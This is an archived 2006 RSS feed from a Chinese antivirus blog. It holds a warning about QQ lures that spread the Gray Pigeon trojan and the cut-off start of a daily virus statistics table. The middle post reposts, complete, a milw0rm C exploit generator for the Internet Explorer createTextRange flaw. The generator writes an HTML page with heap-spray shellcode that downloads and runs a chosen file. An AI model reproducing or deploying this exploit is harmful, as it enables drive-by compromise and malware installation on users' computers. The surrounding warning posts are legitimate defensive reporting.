<?xml version="1.0" encoding="GB2312"?>   
<rdf:RDF 
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" 
xmlns:dc="http://purl.org/dc/elements/1.1/" 
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" 
xmlns:admin="http://webns.net/mvcb/" 
xmlns:cc="http://web.resource.org/cc/" 
xmlns="http://purl.org/rss/1.0/"> 

<channel rdf:about="http://daishuo.bokee.com/index.html"> 
<title><![CDATA[加糖苦咖啡]]></title> 
<link>http://daishuo.bokee.com/index.html</link> 
<description><![CDATA[<iframe width=660 height=160 frameborder=0 scrolling=no src='http://daishuo.bokee.com/inc/intro2.htm'></iframe>
]]></description> 
<dc:language>zh-cn</dc:language> 
<dc:creator>daishuo</dc:creator> 
<dc:date>2006-04-01T02:33:30Z</dc:date> 
<admin:generatorAgent rdf:resource="http://blog.bokee.com/" /> 

<items> 
<rdf:Seq>
<rdf:li rdf:resource="http://daishuo.bokee.com/4780879.html" />
<rdf:li rdf:resource="http://daishuo.bokee.com/4751123.html" />
<rdf:li rdf:resource="http://daishuo.bokee.com/4740531.html" />
<rdf:li rdf:resource="http://daishuo.bokee.com/4726128.html" />
<rdf:li rdf:resource="http://daishuo.bokee.com/4726109.html" />
<rdf:li rdf:resource="http://daishuo.bokee.com/4726091.html" />
<rdf:li rdf:resource="http://daishuo.bokee.com/4693833.html" />
<rdf:li rdf:resource="http://daishuo.bokee.com/4693828.html" />
<rdf:li rdf:resource="http://daishuo.bokee.com/4674227.html" />
<rdf:li rdf:resource="http://daishuo.bokee.com/4672059.html" />
</rdf:Seq> 
</items> 

</channel>


<item rdf:about="http://daishuo.bokee.com/4780879.html"> 
<title><![CDATA[灰鸽子和网络色情钓鱼]]></title> 
<link>http://daishuo.bokee.com/4780879.html</link> 
<description><![CDATA[<p>&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 前些日子接到网友线报，反映有些人在QQ信息说明中打着色情交友的幌子传播病毒。当时好歹看了一下，然后就开始忙CMMI的工作，没有写到blog上。今天CMMI终于过了，突然想起这事来，补发一篇，希望能给那些用下半身思考的男性网友们提个醒，不要轻易上当 :-| </p><p>1、有几个QQ号的说明文字都包含下面字样“本人诚征男人一名……本人相册可供参考<a href="http://takephoto.ys168.com/">http://takephoto.ys168.com</a>”。网址是一个永硕网络硬盘，上面有“我的照片！嘻嘻.scr”文件下载，该文件运行后，会显示一幅女孩图片，并释放出灰鸽子病毒。</p><img height="351" alt="girl_gbird" src="http://static.flickr.com/55/120833496_c9c3ec9551_o.gif" width="569" /><p /><p>2、有人打着网络视频的幌子传播病毒。我把网友提供的QQ号加为好友，下面是一段QQ聊天记录：</p><img height="655" alt="girl_chat" src="http://static.flickr.com/48/120833497_87c0bc8ab8_o.gif" width="286" /><p>接收下来的所谓“视频冲浪观看软件.rar”实际上就是一个虚假的说明文档和一个灰鸽子2006病毒。</p><img height="270" alt="recvd_gbird" src="http://static.flickr.com/53/120833498_f086e3610d_o.png" width="459" /><p />]]></description> 
<dc:subject><![CDATA[病毒反病毒]]></dc:subject> 
<dc:creator><![CDATA[daishuo]]></dc:creator> 
<dc:date>2006-04-01T02:33:30Z</dc:date> 
</item> 
<item rdf:about="http://daishuo.bokee.com/4751123.html"> 
<title><![CDATA[IE createTextRange漏洞文件下载木马生成器]]></title> 
<link>http://daishuo.bokee.com/4751123.html</link> 
<description><![CDATA[<p>IE的createTextRange漏洞已经出来几天了。这个漏洞的利用代码依然会分配大量内存，总得来说，可以远程代码执行，自然是严重等级的漏洞，但利用起来代价很大，512M内存的机器上跑的话，也需要1～2分钟才会运行shellcode，所以今后它的泛滥程度会远低于WMF/HHCTRL/MHTML等漏洞。</p><p>在这里，转载一个利用createTextRange漏洞的文件下载木马生成器的源码，供从事系统安全的朋友们娱乐。其实，大家可能早就<a href="http://www.baidu.com/s?ie=gb2312&amp;bs=%25u9090&amp;sr=&amp;z=&amp;cl=3&amp;f=8&amp;wd=%25u9090+createTextRange&amp;ct=0">baidu到一些</a>了，呵呵。<br /></p><textarea style="WIDTH: 518px; HEIGHT: 221px" rows="12" cols="57">/*
*
* Internet Explorer &amp;quot;createTextRang&amp;quot; Download Shellcoded Exploit
* Bug discovered by Computer Terrorism (UK)
* http://www.computerterrorism.com/research/ct22-03-2006
* Reliable exploitation by Darkeagle of Unl0ck Research Team
* http://www.milw0rm.com/exploits/1606
*
* Affected Software: Microsoft Internet Explorer 6.x &amp;amp; 7 Beta 2
* Severity: Critical
* Impact: Remote System Access
* Solution Status: Unpatched
*
* E-Mail: atmaca@icqmail.com
* Web: http://www.spyinstructors.com,http://www.atmacasoft.com
* Credit to Kozan,Darkeagle,delikon,Stelian Ene
*
*/

#include &amp;lt;windows.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;

#define BUF_LEN         0x1518
#define FILE_NAME       &amp;quot;index.htm&amp;quot;

char body1[] =
	&amp;quot;&amp;lt;input type=\&amp;quot;checkbox\&amp;quot; id=\&amp;quot;blah\&amp;quot;&amp;gt;\r\n&amp;quot;
	&amp;quot;&amp;lt;SCRIPT language=\&amp;quot;javascript\&amp;quot;&amp;gt;\r\n\r\n&amp;quot;
	&amp;quot;shellcode = unescape(\r\n&amp;quot;
	&amp;quot;\t\&amp;quot;%uCCE9%u0000%u5F00%u56E8%u0000%u8900%u50C3%u8E68%u0E4E%uE8EC\&amp;quot; +\r\n&amp;quot;
	&amp;quot;\t\&amp;quot;%u0060%u0000%uC931%uB966%u6E6F%u6851%u7275%u6D6C%uFF54%u50D0\&amp;quot; +\r\n&amp;quot;
	&amp;quot;\t\&amp;quot;%u3668%u2F1A%uE870%u0046%u0000%uC931%u5151%u378D%u8D56%u0877\&amp;quot; +\r\n&amp;quot;
	&amp;quot;\t\&amp;quot;%u5156%uD0FF%u6853%uFE98%u0E8A%u2DE8%u0000%u5100%uFF57%u31D0\&amp;quot; +\r\n&amp;quot;
	&amp;quot;\t\&amp;quot;%u49C9%u9090%u6853%uD87E%u73E2%u19E8%u0000%uFF00%u55D0%u6456\&amp;quot; +\r\n&amp;quot;
	&amp;quot;\t\&amp;quot;%u30A1%u0000%u8B00%u0C40%u708B%uAD1C%u688B%u8908%u5EE8%uC35D\&amp;quot; +\r\n&amp;quot;
	&amp;quot;\t\&amp;quot;%u5553%u5756%u6C8B%u1824%u458B%u8B3C%u0554%u0178%u8BEA%u184A\&amp;quot; +\r\n&amp;quot;
	&amp;quot;\t\&amp;quot;%u5A8B%u0120%uE3EB%u4935%u348B%u018B%u31EE%uFCFF%uC031%u38AC\&amp;quot; +\r\n&amp;quot;
	&amp;quot;\t\&amp;quot;%u74E0%uC107%u0DCF%uC701%uF2EB%u7C3B%u1424%uE175%u5A8B%u0124\&amp;quot; +\r\n&amp;quot;
	&amp;quot;\t\&amp;quot;%u66EB%u0C8B%u8B4B%u1C5A%uEB01%u048B%u018B%uE9E8%u0002%u0000\&amp;quot; +\r\n&amp;quot;
	&amp;quot;\t\&amp;quot;%uC031%uEA89%u5E5F%u5B5D%uE8C3%uFF2F%uFFFF%u686D%u2E68%u7865\&amp;quot; +\r\n&amp;quot;
	&amp;quot;\t\&amp;quot;%u0065&amp;quot;;

char body2[] =
        &amp;quot;\r\n\r\nbigblock = unescape(\&amp;quot;%u9090%u9090\&amp;quot;);\r\n&amp;quot;
        &amp;quot;slackspace = 20 + shellcode.length\r\n\r\n&amp;quot;
        &amp;quot;while (bigblock.length &amp;lt; slackspace)\r\n&amp;quot;
        &amp;quot;\tbigblock += bigblock;\r\n\r\n&amp;quot;
        &amp;quot;fillblock = bigblock.substring(0, slackspace);\r\n\r\n&amp;quot;
        &amp;quot;block = bigblock.substring(0, bigblock.length-slackspace);\r\n\r\n&amp;quot;
        &amp;quot;while(block.length + slackspace &amp;lt; 0x40000)\r\n&amp;quot;
        &amp;quot;\tblock = block + block + fillblock;\r\n\r\n&amp;quot;
        &amp;quot;memory = new Array();\r\n\r\n&amp;quot;
        &amp;quot;for ( i = 0; i &amp;lt; 2020; i++ )\r\n&amp;quot;
        &amp;quot;\tmemory[i] = block + shellcode;\r\n\r\n&amp;quot;
        &amp;quot;var r = document.getElementById('blah').createTextRange();\r\n\r\n&amp;quot;
        &amp;quot;&amp;lt;/script&amp;gt;\r\n&amp;quot;;


int main(int argc,char *argv[])
{
        if (argc &amp;lt; 2)
        {
                printf(&amp;quot;\nInternet Explorer \&amp;quot;createTextRang\&amp;quot; Download Shellcoded Exploit&amp;quot;);
                printf(&amp;quot;\nUsage:\n&amp;quot;);
                printf(&amp;quot; ie_exp &amp;lt;WebUrl&amp;gt;\n&amp;quot;);

                return 0;
        }

        FILE *File;
        char *pszBuffer;
        char *web = argv[1];
        char *pu = &amp;quot;%u&amp;quot;;
        char u_t[5];
        char *utf16 = (char*)malloc(strlen(web)*5);

        if ( (File = fopen(FILE_NAME,&amp;quot;w+b&amp;quot;)) == NULL ) {
                printf(&amp;quot;\n [Err:] fopen()&amp;quot;);
                exit(1);
        }

        pszBuffer = (char*)malloc(BUF_LEN);
        memcpy(pszBuffer,body1,sizeof(body1)-1);

        memset(utf16,'\0',strlen(web)*5);
        for (unsigned int i=0;i&amp;lt;strlen(web);i=i+2)
        {
                sprintf(u_t,&amp;quot;%s%.2x%.2x&amp;quot;, pu, web[i+1], web[i]);
                strcat(utf16,u_t);
        }

        strcat(pszBuffer,utf16);
        strcat(pszBuffer,&amp;quot;%u0000\&amp;quot;);&amp;quot;);
        strcat(pszBuffer,body2);

        fwrite(pszBuffer, BUF_LEN, 1,File);
        fclose(File);

        printf(&amp;quot;\n\n&amp;quot;  FILE_NAME  &amp;quot; has been created in the current directory.\n&amp;quot;);
        return 1;
}

// milw0rm.com [2006-03-23]

&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;</textarea>]]></description> 
<dc:subject><![CDATA[病毒反病毒]]></dc:subject> 
<dc:creator><![CDATA[daishuo]]></dc:creator> 
<dc:date>2006-03-27T23:04:15Z</dc:date> 
</item> 
<item rdf:about="http://daishuo.bokee.com/4740531.html"> 
<title><![CDATA[昨日病毒(2006.03.24)]]></title> 
<link>http://daishuo.bokee.com/4740531.html</link> 
<description><![CDATA[<span>&amp;nbsp;<table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 562px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 562px" width="562" /></colgroup><tbody valign="top"><tr style="MIN-HEIGHT: 41px"><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #99ccff" width="562"><div><strong><font face="Arial">昨日病毒</font></strong></div></td></tr><tr style="MIN-HEIGHT: 31px"><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width="562"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 295px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 146px" width="146" /><col style="WIDTH: 149px" width="149" /></colgroup><tbody valign="top"><tr><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width="146"><div><font face="Arial"><strong>统计时段</strong></font></div></td><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width="149"><div><font face="宋体"><div title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline; FONT-SIZE: x-small; MARGIN: 1px 1px 2px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; BACKGROUND-COLOR: window"><span id="L025D04E004BA05E6" style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; OVERFLOW: hidden; WIDTH: 100%; MARGIN-RIGHT: 22px; PADDING-TOP: 0px; WHITE-SPACE: nowrap; HEIGHT: 100%">2006-3-24</span><span style="MARGIN-LEFT: -21px; WIDTH: 20px; HEIGHT: 18px"></span></div></font></div></td></tr></tbody></table></span><div></div></td></tr><tr><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width="562"><span><table title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 555px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border="1"><colgroup><col style="WIDTH: 555px" width="555" /></colgroup><tbody><tr><td style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width="555"><div><strong><font face="Arial">病毒样本上报数排行</font></strong></div><div><strong><font face="Arial"></font></strong>&amp;nbsp;</div><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 394px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 229px" width="229" /><col style="WIDTH: 165px" width="165" /></colgroup><tbody valign="top"><tr style="MIN-HEIGHT: 22px"><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="229"><div align="center"><font face="Arial">样本文件名</font></div></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="165"><div align="center"><font face="Arial">上报次数</font></div></td></tr></tbody></table></span><div></div></td></tr></tbody><tbody><tr id="L025D06A007170C89"><td style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width="555"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 229px" width="229" /><col style="WIDTH: 166px" width="166" /></colgroup><tbody valign="top"><tr><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="229"><font face="宋体"><div><span><span id="L025D0720097413AC" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">icntrl.exe</span></span></div></font></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="166"><div><font face="宋体"><span><span id="L025D07600BD11B0F" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">222</span></span></font></div></td></tr></tbody></table></span><div></div></td></tr><tr id="L025DC0401C5D0CC4"><td style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width="555"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 229px" width="229" /><col style="WIDTH: 166px" width="166" /></colgroup><tbody valign="top"><tr><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="229"><font face="宋体"><div><span><span id="L025DC0C01EBACD87" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">lup.exe</span></span></div></font></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="166"><div><font face="宋体"><span><span id="L025DC10021188E8A" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">149</span></span></font></div></td></tr></tbody></table></span><div></div></td></tr><tr id="L030060402418EECD"><td style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width="555"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 229px" width="229" /><col style="WIDTH: 166px" width="166" /></colgroup><tbody valign="top"><tr><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="229"><font face="宋体"><div><span><span id="L030060C027194F90" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">mssvcc.exe</span></span></div></font></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="166"><div><font face="宋体"><span><span id="L030061002A19B093" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">130</span></span></font></div></td></tr></tbody></table></span><div></div></td></tr><tr id="L0300A0402D1A50D6"><td style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width="555"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 229px" width="229" /><col style="WIDTH: 166px" width="166" /></colgroup><tbody valign="top"><tr><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="229"><font face="宋体"><div><span><span id="L0300A0C0301AF199" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">wuass32.exe</span></span></div></font></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="166"><div><font face="宋体"><span><span id="L0300A100331B929C" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">93</span></span></font></div></td></tr></tbody></table></span><div></div></td></tr><tr id="L0300E040361C72DF"><td style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width="555"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 229px" width="229" /><col style="WIDTH: 166px" width="166" /></colgroup><tbody valign="top"><tr><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="229"><font face="宋体"><div><span><span id="L0300E0C0391D53A2" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">mssm32.exe</span></span></div></font></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="166"><div><font face="宋体"><span><span id="L0300E1003C1E34A5" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">86</span></span></font></div></td></tr></tbody></table></span><div></div></td></tr></tbody></table></span><div></div></td></tr><tr style="MIN-HEIGHT: 118px"><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width="562"><div><font face="Arial"><strong>技术分析</strong></font></div><span><span id="L025D08200E2E2332" title="" style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 5px; PADDING-BOTTOM: 1px; MARGIN: 6px 0px; BORDER-LEFT: #000000 1pt solid; WIDTH: 100%; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #e1ecf7"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 540px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 540px" width="540" /></colgroup><tbody valign="top"><tr style="MIN-HEIGHT: 16px"><td style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width="540"><span><table title="" style="TABLE-LAYOUT: fixed; 